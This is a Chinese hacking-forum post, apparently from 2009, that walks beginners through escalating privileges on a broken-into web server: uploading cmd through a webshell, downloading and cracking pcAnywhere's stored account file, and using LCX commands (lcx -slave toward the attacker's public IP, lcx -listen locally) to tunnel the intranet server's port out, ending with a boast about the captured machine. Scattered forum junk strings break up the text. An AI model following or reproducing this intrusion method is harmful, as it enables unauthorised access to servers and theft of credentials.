|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
8 ^2 Z, o2 y: b. h
$ q" ]" a8 G: N. i/ Q! E+ t$ Y, G4 b提权方法:pcanywhere+LCX) e/ ^; G% v3 w
8 I/ O& s* I0 ^; o( |$ L% ?# }获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。( ^" P# V2 U! A# w8 h$ A7 l
! G! o( Q$ K* ^3 v在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
# T! X' _4 O6 f$ n: ?& D1 V! H% x/ J/ U/ l3 ~
# d: c0 s1 y* @( f- C- b+ Y
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。2 v+ f1 d) z' U
/ Q0 b0 L" L" m5 i$ u% |$ P5 o7 u0 s! O5 p" E# e' R9 X
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。- w9 o7 y3 u$ f9 f0 n
9 w$ v9 l5 }8 c& o9 t5 c- G. p! h, j! L
, B) v- `2 N# i8 U$ M
$ o, t5 e0 ^8 R3 | Q由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``1 O& w. Q2 R' c6 R
, X( R, G8 }* W$ L6 P3 b
+ _) h# z I" G' i' oLCX的用法再简单说下:
1 G' s+ T+ b! _2 j$ Z* n/ \% [( m
! V& z7 u8 |1 o$ n' b: W9 I/ n# f服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口); N0 O3 k& t( X; i. m! B* a% l" u
% @: }6 d0 F' N
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
* e7 x2 ^2 U; f$ p3 C7 h: T" a0 D" f' J' o
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。! [5 u/ a4 \/ Q7 I0 C
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``% P0 ?9 D1 d! O- i
- i4 X s% b: x6 k( ?. z
4 f9 O2 O! v8 ?
6 \5 y: V$ ^8 N! H+ d R( q$ m& t# Q* h5 g/ F3 n
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。6 \9 ?. l! ~ ^! l
# @4 P- K' ~% b% l4 d
7 W, _, r( }; \; l0 M: \6 n) Q0 N1 C1 ~) c2 \+ y2 I: \1 u. c
# X# g! U8 [; \0 x0 X
我们本地连接试试,输入我们刚破解的账号密码
& @2 M8 r1 @) y' P: `& m
- u; Y& M" V. V' T- X- I" H5 N
$ w( Y' ?, f0 J8 r, I% d& t8 r呵呵``连接成功,服务器不错,又一个8核^︵^5 H1 S2 `& @4 H4 h7 E8 S( t4 p6 h
+ P5 O; Q6 G& Q. m- i" O. [7 p5 o5 N0 U+ A
. c6 d5 n0 `% [0 N& B p+ m5 l |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
